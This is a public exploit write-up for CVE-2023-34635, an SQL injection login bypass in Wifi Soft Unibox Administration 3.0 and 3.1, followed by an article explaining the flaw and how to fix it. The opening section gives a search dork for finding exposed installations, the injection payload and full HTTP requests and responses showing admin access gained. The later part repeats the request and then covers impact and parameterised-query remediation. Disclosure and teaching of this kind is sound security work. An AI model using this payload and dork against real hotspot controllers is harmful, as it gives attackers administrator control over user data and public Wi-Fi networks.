Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection
# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author Contact : arkinux01@gmail.com
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link:
https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635
The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
SQL Injection, which can lead to unauthorised admin access for attackers.
The vulnerability occurs because of not validating or sanitising the user
input in the username field of the login page and directly sending the
input to the backend server and database.
## How to Reproduce
Step 1 : Visit the login page and check the version, whether it is 3.0,
3.1, or not.
Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
enter any random password.
Step 3 : Fill in the captcha and hit login. After hitting login, you have
been successfully logged in as an administrator and can see anyone's user
data, modify data, revoke access, etc.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
Parameters: username, password, captcha, action
-----------------------------------------------------------------------------------------------------------------------
POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private
<!DOCTYPE html>
<html lang="en">
html content
</html>Wifi Soft Unibox Administration 3.0 & 3.1: A Critical SQL Injection Vulnerability Exposed
Security researchers have uncovered a severe vulnerability in the Wifi Soft Unibox Administration 3.0 and 3.1 web interface, which allows attackers to gain unauthorized administrative access through a simple SQL injection exploit. Identified as CVE-2023-34635, this flaw highlights the dangers of inadequate input validation in enterprise-grade network management software.
Understanding the Vulnerability
The core issue lies in the login page's handling of user input. Specifically, the username field is not properly sanitized before being sent to the backend database. This omission creates a direct path for malicious payloads to manipulate SQL queries, bypassing authentication entirely.
Attackers can exploit this by injecting a crafted payload into the username field, effectively turning the authentication logic into a always-true condition. The payload 'or 1=1 limit 1-- - is particularly effective because it:
- Breaks the SQL query structure with a single quote (
') - Introduces a condition that is always true (
or 1=1) - Uses
limit 1to restrict results to a single record - Terminates the query with
-- -to comment out the rest of the statement
This combination ensures the database returns a single admin user record, regardless of the actual credentials entered.
Exploitation in Practice
Consider the following HTTP POST request to the login endpoint:
POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login
Explanation: This request sends the malicious payload in the username parameter. The password field is irrelevant due to the logic bypass. The captcha field is required for anti-bot protection, but can be bypassed with automated tools or manual entry. The action=Login parameter triggers the authentication process.
Upon successful execution, the server responds with a redirect to the admin dashboard, granting full access to:
- User account data
- Access control settings
- Session management
- Configuration changes
- Remote device management
Impact and Risks
The implications of this vulnerability are profound:
| Risk Category | Description |
|---|---|
| Privilege Escalation | Attackers gain full administrative privileges without valid credentials. |
| Data Exposure | Complete access to user records, including passwords (if stored in plaintext or weakly hashed). |
| Denial of Service | Malicious users can disable access for legitimate users or corrupt configurations. |
| Network Compromise | Admin access enables manipulation of hotspot policies, leading to unauthorized access or redirection. |
Given that Unibox is used in public Wi-Fi networks (e.g., cafes, airports, hotels), this vulnerability could lead to widespread exploitation, potentially enabling attackers to:
- Monitor user activity
- Redirect traffic to phishing sites
- Inject malicious scripts into sessions
- Disable security features
Technical Analysis: Why This Happens
At the root, this vulnerability stems from poor coding practices:
- Direct Query Injection: The application constructs SQL queries using raw user input without parameterization.
- Missing Input Sanitization: No filtering or escaping of special characters (e.g.,
',;,or) occurs before database interaction. - Use of Classic SQL Logic: The query likely resembles:
SELECT * FROM users WHERE username = 'input' AND password = 'input', which is vulnerable to manipulation.
Modern frameworks (e.g., PHP with PDO, Python with SQLAlchemy) enforce parameterized queries to prevent such exploits. The absence of this in Unibox Administration 3.0/3.1 is a critical oversight.
Remediation and Best Practices
Organizations using Unibox must take immediate action:
- Upgrade to the latest version: Ensure vendors have released patches for CVE-2023-34635.
- Implement input validation: Use regular expressions to filter out SQL-specific characters.
- Use parameterized queries: Replace string concatenation with prepared statements.
- Enable logging and monitoring: Track login attempts and detect anomalies.
- Enforce multi-factor authentication: Reduce reliance on single-point credentials.
Example of a secure query in PHP using PDO:
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);
$user = $stmt->fetch();
Explanation: This approach separates the SQL logic from user input, preventing any manipulation. The ? placeholders are filled with sanitized values, ensuring no injection can occur.
Conclusion
The CVE-2023-34635 vulnerability in Wifi Soft Unibox Administration 3.0 & 3.1 is a stark reminder that even seemingly benign web interfaces can pose significant security risks. It underscores the importance of:
- Secure coding standards
- Regular security audits
- Continuous patching and updates
For administrators, this exploit should serve as a wake-up call: never assume a login form is secure. Always validate inputs, use modern security practices, and treat every user input as potentially malicious.